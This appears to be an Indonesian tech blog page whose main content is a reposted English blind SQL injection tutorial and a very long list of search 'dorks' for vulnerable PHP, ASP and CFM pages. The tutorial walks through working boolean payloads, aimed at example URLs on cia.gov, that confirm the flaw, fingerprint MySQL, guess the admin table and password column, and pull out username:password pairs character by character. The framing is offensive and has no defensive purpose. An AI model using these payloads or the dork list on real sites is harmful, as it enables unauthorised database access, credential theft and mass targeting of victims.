Router

Cara setting Router TP-LINK

Memblokir situs

memblokir situs pada jam tertentu di MIKROTIK

FL Studio Home

Kini membuat Produksi Musik sendiri semakin mudah.

Editor Music

aplikasi untuk mencipta atau mengedit musik.

VMware 8.0.1

VMware versi 8.0.1 telah hadir menggantikan VMware versi terdahulunya.

Apr 30, 2012

Blind SQL injection Tutorial

you dont know about mysql injection turn around and learn it b4 u even consider learning this
because this is a whole different story.

1. test for vulnerability
so you have a site lets say :

Code:
www.cia.gov/news.php?id=1

just like normal mysql injection

but for blind you put

Code:
www.cia.gov/news.php?id=1 and 1=2
if you see any text from the page missing
or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln

this works
because 1=2 is always false
you see if it was
Code:
www.cia.gov/index.php?id=1 and 1=1
then you would get the normal page
because 1=1 is always true

2. mysql version
to find mysql version you need to do this query
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4
if the pages comes back true then the version is 4
if not then try
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
if it comes back true then its a version 5

3. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
i have guessed the table admin if the page loads true then the table exists
eg. the table name is administrator
and we try
Code:
(SELECT 1 from users limit 0,1)=1
then it will return with an error a.k.a. false
but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1
then it would not error a.k.a. true

now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
if the column password exists then it wont error
you get my drift...

4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
if this returns true then you need to go higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
if this errors then its not greater than 103 and greater than/or 99
now try
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
no error then its greater than 99 and not greater than 103
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
error
so its greater than 99 but not greater than 101
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
error
so its greater than 99 but not greater than 100 making it 100
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
notice how i did where userid=1),2,1))>60 instead of 1,1
so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password.

List Dork Sql injection

Sekedar Share beberapa Dork dalam Web attacking Sql injection.

PHP:
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?TextID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=

ASP:

about.asp?cartID=
accinfo.asp?cartId=
acclogin.asp?cartID=
add.asp?bookid=
add_cart.asp?num=
addcart.asp?
addItem.asp
add-to-cart.asp?ID=
addToCart.asp?idProduct=
addtomylist.asp?ProdId=
adminEditProductFields.asp?intProdID=
advSearch_h.asp?idCategory=
affiliate.asp?ID=
affiliate-agreement.cfm?storeid=
affiliates.asp?id=
ancillary.asp?ID=
archive.asp?id=
article.asp?id=
aspx?PageID
basket.asp?id=
Book.asp?bookID=
book_list.asp?bookid=
book_view.asp?bookid=
BookDetails.asp?ID=
browse.asp?catid=
browse_item_details.asp
Browse_Item_Details.asp?Store_Id=
buy.asp?
buy.asp?bookid=
bycategory.asp?id=
cardinfo.asp?card=
cart.asp?action=
cart.asp?cart_id=
cart.asp?id=
cart_additem.asp?id=
cart_validate.asp?id=
cartadd.asp?id=
cat.asp?iCat=
catalog.asp
catalog.asp?CatalogID=
catalog_item.asp?ID=
catalog_main.asp?catid=
category.asp
category.asp?catid=
category_list.asp?id=
categorydisplay.asp?catid=
checkout.asp?cartid=
checkout.asp?UserID=
checkout_confirmed.asp?order_id=
checkout1.asp?cartid=
comersus_listCategoriesAndProducts.asp?idCategory=
comersus_optEmailToFriendForm.asp?idProduct=
comersus_optReviewReadExec.asp?idProduct=
comersus_viewItem.asp?idProduct=
comments_form.asp?ID=
contact.asp?cartId=
content.asp?id=
customerService.asp?TextID1=
default.asp?catID=
description.asp?bookid=
details.asp?BookID=
details.asp?Press_Release_ID=
details.asp?Product_ID=
details.asp?Service_ID=
display_item.asp?id=
displayproducts.asp
downloadTrial.asp?intProdID=
emailproduct.asp?itemid=
emailToFriend.asp?idProduct=
events.asp?ID=
faq.asp?cartID=
faq_list.asp?id=
faqs.asp?id=
feedback.asp?title=
freedownload.asp?bookid=
fullDisplay.asp?item=
getbook.asp?bookid=
GetItems.asp?itemid=
giftDetail.asp?id=
help.asp?CartId=
home.asp?id=
index.asp?cart=
index.asp?cartID=
index.asp?ID=
info.asp?ID=
item.asp?eid=
item.asp?item_id=
item.asp?itemid=
item.asp?model=
item.asp?prodtype=
item.asp?shopcd=
item_details.asp?catid=
item_list.asp?maingroup
item_show.asp?code_no=
itemDesc.asp?CartId=
itemdetail.asp?item=
itemdetails.asp?catalogid=
learnmore.asp?cartID=
links.asp?catid=
list.asp?bookid=
List.asp?CatID=
listcategoriesandproducts.asp?idCategory=
modline.asp?id=
myaccount.asp?catid=
news.asp?id=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
OrderForm.asp?Cart=
page.asp?PartID=
payment.asp?CartID=
pdetail.asp?item_id=
powersearch.asp?CartId=
price.asp
privacy.asp?cartID=
prodbycat.asp?intCatalogID=
prodetails.asp?prodid=
prodlist.asp?catid=
product.asp?bookID=
product.asp?intProdID=
product_info.asp?item_id=
productDetails.asp?idProduct=
productDisplay.asp
productinfo.asp?item=
productlist.asp?ViewType=Category&CategoryID=
productpage.asp
products.asp?ID=
products.asp?keyword=
products_category.asp?CategoryID=
products_detail.asp?CategoryID=
productsByCategory.asp?intCatalogID=
prodView.asp?idProduct=
promo.asp?id=
promotion.asp?catid=
pview.asp?Item=
resellers.asp?idCategory=
results.asp?cat=
savecart.asp?CartId=
search.asp?CartID=
searchcat.asp?search_id=
Select_Item.asp?id=
Services.asp?ID=
shippinginfo.asp?CartId=
shop.asp?a=
shop.asp?action=
shop.asp?bookid=
shop.asp?cartID=
shop_details.asp?prodid=
shopaddtocart.asp
shopaddtocart.asp?catalogid=
shopbasket.asp?bookid=
shopbycategory.asp?catid=
shopcart.asp?title=
shopcreatorder.asp
shopcurrency.asp?cid=
shopdc.asp?bookid=
shopdisplaycategories.asp
shopdisplayproduct.asp?catalogid=
shopdisplayproducts.asp
shopexd.asp
shopexd.asp?catalogid=
shopping_basket.asp?cartID=
shopprojectlogin.asp
shopquery.asp?catalogid=
shopremoveitem.asp?cartid=
shopreviewadd.asp?id=
shopreviewlist.asp?id=
ShopSearch.asp?CategoryID=
shoptellafriend.asp?id=
shopthanks.asp
shopwelcome.asp?title=
show_item.asp?id=
show_item_details.asp?item_id=
showbook.asp?bookid=
showStore.asp?catID=
shprodde.asp?SKU=
specials.asp?id=
store.asp?id=
store_bycat.asp?id=
store_listing.asp?id=
Store_ViewProducts.asp?Cat=
store-details.asp?id=
storefront.asp?id=
storefronts.asp?title=
storeitem.asp?item=
StoreRedirect.asp?ID=
subcategories.asp?id=
tek9.asp?
template.asp?Action=Item&pid=
topic.asp?ID=
tuangou.asp?bookid=
type.asp?iType=
updatebasket.asp?bookid=
updates.asp?ID=
view.asp?cid=
view_cart.asp?title=
view_detail.asp?ID=
viewcart.asp?CartId=
viewCart.asp?userID=
viewCat_h.asp?idCategory=
viewevent.asp?EventID=
viewitem.asp?recor=
viewPrd.asp?idcategory=
ViewProduct.asp?misc=
voteList.asp?item_ID=
whatsnew.asp?idCategory=
WsAncillary.asp?ID=
WsPages.asp?ID=

CFM:

about.cfm?cartID=
accinfo.cfm?cartId=
acclogin.cfm?cartID=
add.cfm?bookid=
add_cart.cfm?num=
addcart.cfm?
addItem.cfm
add-to-cart.cfm?ID=
addToCart.cfm?idProduct=
addtomylist.cfm?ProdId=
adminEditProductFields.cfm?intProdID=
advSearch_h.cfm?idCategory=
affiliate.cfm?ID=
affiliate-agreement.cfm?storeid=
affiliates.cfm?id=
ancillary.cfm?ID=
archive.cfm?id=
article.cfm?id=
cfmx?PageID
basket.cfm?id=
Book.cfm?bookID=
book_list.cfm?bookid=
book_view.cfm?bookid=
BookDetails.cfm?ID=
browse.cfm?catid=
browse_item_details.cfm
Browse_Item_Details.cfm?Store_Id=
buy.cfm?
buy.cfm?bookid=
bycategory.cfm?id=
cardinfo.cfm?card=
cart.cfm?action=
cart.cfm?cart_id=
cart.cfm?id=
cart_additem.cfm?id=
cart_validate.cfm?id=
cartadd.cfm?id=
cat.cfm?iCat=
catalog.cfm
catalog.cfm?CatalogID=
catalog_item.cfm?ID=
catalog_main.cfm?catid=
category.cfm
category.cfm?catid=
category_list.cfm?id=
categorydisplay.cfm?catid=
checkout.cfm?cartid=
checkout.cfm?UserID=
checkout_confirmed.cfm?order_id=
checkout1.cfm?cartid=
comersus_listCategoriesAndProducts.cfm?idCategory=
comersus_optEmailToFriendForm.cfm?idProduct=
comersus_optReviewReadExec.cfm?idProduct=
comersus_viewItem.cfm?idProduct=
comments_form.cfm?ID=
contact.cfm?cartId=
content.cfm?id=
customerService.cfm?TextID1=
default.cfm?catID=
description.cfm?bookid=
details.cfm?BookID=
details.cfm?Press_Release_ID=
details.cfm?Product_ID=
details.cfm?Service_ID=
display_item.cfm?id=
displayproducts.cfm
downloadTrial.cfm?intProdID=
emailproduct.cfm?itemid=
emailToFriend.cfm?idProduct=
events.cfm?ID=
faq.cfm?cartID=
faq_list.cfm?id=
faqs.cfm?id=
feedback.cfm?title=
freedownload.cfm?bookid=
fullDisplay.cfm?item=
getbook.cfm?bookid=
GetItems.cfm?itemid=
giftDetail.cfm?id=
help.cfm?CartId=
home.cfm?id=
index.cfm?cart=
index.cfm?cartID=
index.cfm?ID=
info.cfm?ID=
item.cfm?eid=
item.cfm?item_id=
item.cfm?itemid=
item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item_details.cfm?catid=
item_list.cfm?maingroup
item_show.cfm?code_no=
itemDesc.cfm?CartId=
itemdetail.cfm?item=
itemdetails.cfm?catalogid=
learnmore.cfm?cartID=
links.cfm?catid=
list.cfm?bookid=
List.cfm?CatID=
listcategoriesandproducts.cfm?idCategory=
modline.cfm?id=
myaccount.cfm?catid=
news.cfm?id=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
OrderForm.cfm?Cart=
page.cfm?PartID=
payment.cfm?CartID=
pdetail.cfm?item_id=
powersearch.cfm?CartId=
price.cfm
privacy.cfm?cartID=
prodbycat.cfm?intCatalogID=
prodetails.cfm?prodid=
prodlist.cfm?catid=
product.cfm?bookID=
product.cfm?intProdID=
product_info.cfm?item_id=
productDetails.cfm?idProduct=
productDisplay.cfm
productinfo.cfm?item=
productlist.cfm?ViewType=Category&CategoryID=
productpage.cfm
products.cfm?ID=
products.cfm?keyword=
products_category.cfm?CategoryID=
products_detail.cfm?CategoryID=
productsByCategory.cfm?intCatalogID=
prodView.cfm?idProduct=
promo.cfm?id=
promotion.cfm?catid=
pview.cfm?Item=
resellers.cfm?idCategory=
results.cfm?cat=
savecart.cfm?CartId=
search.cfm?CartID=
searchcat.cfm?search_id=
Select_Item.cfm?id=
Services.cfm?ID=
shippinginfo.cfm?CartId=
shop.cfm?a=
shop.cfm?action=
shop.cfm?bookid=
shop.cfm?cartID=
shop_details.cfm?prodid=
shopaddtocart.cfm
shopaddtocart.cfm?catalogid=
shopbasket.cfm?bookid=
shopbycategory.cfm?catid=
shopcart.cfm?title=
shopcreatorder.cfm
shopcurrency.cfm?cid=
shopdc.cfm?bookid=
shopdisplaycategories.cfm
shopdisplayproduct.cfm?catalogid=
shopdisplayproducts.cfm
shopexd.cfm
shopexd.cfm?catalogid=
shopping_basket.cfm?cartID=
shopprojectlogin.cfm
shopquery.cfm?catalogid=
shopremoveitem.cfm?cartid=
shopreviewadd.cfm?id=
shopreviewlist.cfm?id=
ShopSearch.cfm?CategoryID=
shoptellafriend.cfm?id=
shopthanks.cfm
shopwelcome.cfm?title=
show_item.cfm?id=
show_item_details.cfm?item_id=
showbook.cfm?bookid=
showStore.cfm?catID=
shprodde.cfm?SKU=
specials.cfm?id=
store.cfm?id=
store_bycat.cfm?id=
store_listing.cfm?id=
Store_ViewProducts.cfm?Cat=
store-details.cfm?id=
storefront.cfm?id=
storefronts.cfm?title=
storeitem.cfm?item=
StoreRedirect.cfm?ID=
subcategories.cfm?id=
tek9.cfm?
template.cfm?Action=Item&pid=
topic.cfm?ID=
tuangou.cfm?bookid=
type.cfm?iType=
updatebasket.cfm?bookid=
updates.cfm?ID=
view.cfm?cid=
view_cart.cfm?title=
view_detail.cfm?ID=
viewcart.cfm?CartId=
viewCart.cfm?userID=
viewCat_h.cfm?idCategory=
viewevent.cfm?EventID=
viewitem.cfm?recor=
viewPrd.cfm?idcategory=
ViewProduct.cfm?misc=
voteList.cfm?item_ID=
whatsnew.cfm?idCategory=
WsAncillary.cfm?ID=
WsPages.cfm?ID=HP

All Code:


noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=
catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
category.php?c=
main.php?id=
article.php?id=
showproduct.php?productId=
view_item.php?item=
skunkworks/content.php?id=
index.php?id=
item_show.php?id=
publications.php?Id=
index.php?t=
view_items.php?id=
portafolio/portafolio.php?id=
YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=
category.php?id_category=
main.php?id=
main.php?id=
calendar/event.php?id=
default.php?cPath=
pages/print.php?id=
index.php?pg_t=
_news/news.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
downloads/shambler.php?id=
sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=
more_details.php?id=
detail.php?id=
more_details.php?id=
home.php?cat=
idlechat/message.php?id=
detail.php?id=
print.php?sid=
more_details.php?id=
default.php?cPath=
events/event.php?id=
brand.php?id=
toynbeestudios/content.php?id=
show-book.php?id=
more_details.php?id=
store/default.php?cPath=
property.php?id=
product_details.php?id=
more_details.php?id=
view-event.php?id=
content.php?id=
book.php?id=
page/venue.php?id=
print.php?sid=
colourpointeducational/more_details.php?id=
print.php?sid=
browse/book.php?journalID=
section.php?section=
bookDetails.php?id=
profiles/profile.php?profileid=
event.php?id=
gallery.php?id=
category.php?CID=
corporate/newsreleases_more.php?id=
print.php?id=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
language.php?cid=
language.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=
category.php?CID=
more_details.php?id=
poem_list.php?bookID=
more_details.php?id=
content.php?categoryId=
authorDetails.php?bookID=
press_release.php?id=
item_list.php?cat_id=
colourpointeducational/more_details.php?id=
index.php?pid=
download.php?id=
shop/category.php?cat_id=
i-know/content.php?page=
store/index.php?cat_id=
yacht_search/yacht_view.php?pid=
pharmaxim/category.php?cid=
print.php?sid=
specials.php?osCsid=
store.php?cat_id=
category.php?cid=
displayrange.php?rangeid=
product.php?id=
csc/news-details.php?cat=
products-display-details.php?prodid=
stockists_list.php?area_id=
news/newsitem.php?newsID=
index.php?pid=
newsitem.php?newsid=
category.php?id=
news/newsitem.php?newsID=
details.php?prodId=
publications/publication.php?id=
purelydiamond/products/category.php?cat=
category.php?cid=
product/detail.php?id=
news/newsitem.php?newsID=
details.php?prodID=
item.php?item_id=
edition.php?area_id=
page.php?area_id=
view_newsletter.php?id=
library.php?cat=
categories.php?cat=
page.php?area_id=
categories.php?cat=
publications.php?id=
item.php?sub_id=
page.php?area_id=
page.php?area_id=
category.php?catid=
content.php?cID=
newsitem.php?newsid=
frontend/category.php?id_category=
news/newsitem.php?newsID=
things-to-do/detail.php?id=
page.php?area_id=
page.php?area_id=
listing.php?cat=
item.php?iid=
customer/home.php?cat=
staff/publications.php?sn=
news/newsitem.php?newsID=
library.php?cat=
main/index.php?uid=
library.php?cat=
shop/eventshop/product_detail.php?itemid=
news/newsitem.php?newsID=
news/newsitem.php?newsID=
library.php?cat=
FullStory.php?Id=
publications.php?ID=
publications/book_reviews/full_review.php?id=
newsitem.php?newsID=
newsItem.php?newsId=
site/en/list_service.php?cat=
page.php?area_id=
product.php?ProductID=
releases_headlines_details.php?id=
product.php?shopprodid=
product.php?productid=
product.php?product=
product.php?product_id=
productlist.php?id=
product.php?shopprodid=
garden_equipment/pest-weed-control/product.php?pr=
product.php?shopprodid=
browsepr.php?pr=
productlist.php?id=
kshop/product.php?productid=
product.php?pid=
showproduct.php?prodid=
product.php?productid=
productlist.php?id=
index.php?pageId=
productlist.php?tid=
product-list.php?id=
onlinesales/product.php?product_id=
garden_equipment/Fruit-Cage/product.php?pr=
product.php?shopprodid=
product_info.php?products_id=
productlist.php?tid=
showsub.php?id=
productlist.php?fid=
products.php?cat=
products.php?cat=
product-list.php?id=
product.php?sku=
store/product.php?productid=
products.php?cat=
productList.php?cat=
product_detail.php?product_id=
product.php?pid=
wiki/pmwiki.php?pagename=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?name=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
www/index.php?page=
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?TName=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/viewbody.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=
view_items.php?id=
index.php?pagina=
product.php?prodid=
notify/notify_form.php?topic_id=
php/index.php?id=
content.php?cid=
product.php?product_id=
constructies/product.php?id=
detail.php?id=
php/index.php?id=
index.php?section=
product.php?name=
show_bug.cgi?id=
detail.php?id=
bookpage.php?id=
product.php?id=
today.php?eventid=
main.php?item=
index.php?cPath=
news.php?id=
event.php?id=
print.php?sid=
news/news.php?id=
module/range/dutch_windmill_collection.php?rangeId=
print.php?sid=
show_bug.cgi?id=
product_details.php?product_id=
products.php?groupid=
projdetails.php?id=
product.php?productid=
products.php?catid=
product.php?product_id=
product.php?prodid=
product.php?prodid=
newsitem.php?newsID=
newsitem.php?newsid=
profile.php?id=
locations_in_area.php?area_id=
productlist.php?id=
productsview.php?proid=
rss.php?cat=
pub/pds/pds_view.php?start=
products.php?rub=
ogloszenia/rss.php?cat=
print.php?sid=
product.php?id=
print.php?sid=
magazin.php?cid=
galerie.php?cid=
www/index.php?page=
view.php?id=
content.php?id=
board/read.php?tid=
product.php?id_h=
news.php?id=
index.php?book=
products.php?act=
reply.php?id=
stat.php?id=
products.php?cat_id=
free_board/board_view.html?page=
item.php?id=
view_items.php?id=
main.php?prodID=
gb/comment.php?gb_id=
gb/comment.php?gb_id=
classifieds/showproduct.php?product=
view.php?pageNum_rscomp=
cart/addToCart.php?cid=
content/pages/index.php?id_cat=
content.php?id=
display.php?ID=
display.php?ID=
ponuky/item_show.php?ID=
default.php?cPath=
main/magpreview.php?id=
